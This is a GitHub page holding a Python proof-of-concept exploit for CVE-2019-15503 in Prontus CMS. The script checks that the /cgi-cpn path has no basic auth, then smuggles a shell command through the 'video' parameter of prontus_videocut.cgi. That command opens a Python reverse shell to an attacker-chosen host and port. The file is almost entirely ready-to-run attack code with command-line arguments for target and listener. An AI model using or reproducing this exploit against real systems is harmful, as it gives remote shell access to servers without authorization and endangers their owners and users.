exploits/prontus-rce.py at main · ilv/exploits · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/python3
# CVE-2019-15503
# isra

import argparse
import requests

def exec_rce(host, prontus_id, rhost, rport):

	# check first if /cgi-cpn is basic auth protected
	url_cgi = "{}/cgi-cpn".format(host)

	print("[*] Checking if basic auth is enabled.")
	req = requests.get(url_cgi)

	if(req.status_code == 401):
		print("[*] Basic auth enabled. Aborting...")
		return

	print("[*] Basic auth disabled!")
	print("[*] Building RCE...")

	# build reverse shell
	cmd = "/usr/bin/python -c 'import socket,subprocess,os;s%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{}\",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p%3Dsubprocess.call([\"/bin/sh\",\"-i\"]);'".format(rhost, rport)
	url_rce = "{}/cgi-cpn/xcoding/prontus_videocut.cgi?prontus_id={}&t1=1&t2=2&video=;{};/12345678/mmedia/multimedia_videoA123456.mpeg".format(host, prontus_id, cmd)

	print("[*] sending shell oOoOoOoOoOoOoO!!!")
	# send
	req = requests.get(url_rce)


def main():
	parser = argparse.ArgumentParser()
	parser.add_argument("host", help="target host (e.g. http://foo.bar)")
	parser.add_argument("prontus", help="target prontus ID (e.g. prontus_cms)")
	parser.add_argument("rhost", help="host for reverse shell")
	parser.add_argument("rport", help="port for reverse shell")
	args = parser.parse_args()

	if(not args.host or not args.prontus or not args.rhost or not args.rport):
		print("Missing arguments. Try '{} --help' for more information.".format(__file__))
	else:
		print("#"*80)
		print("\n\t ~=== Prontus CMS RCE PoC ===~")
		print("\t+ target host: {}".format(args.host))
		print("\t+ prontus ID: {}".format(args.prontus))
		print("\t+ reverse shell to {}:{}\n".format(args.rhost, args.rport))
		exec_rce(args.host, args.prontus, args.rhost, args.rport)
		print("#"*80)

if __name__ == '__main__':
	main()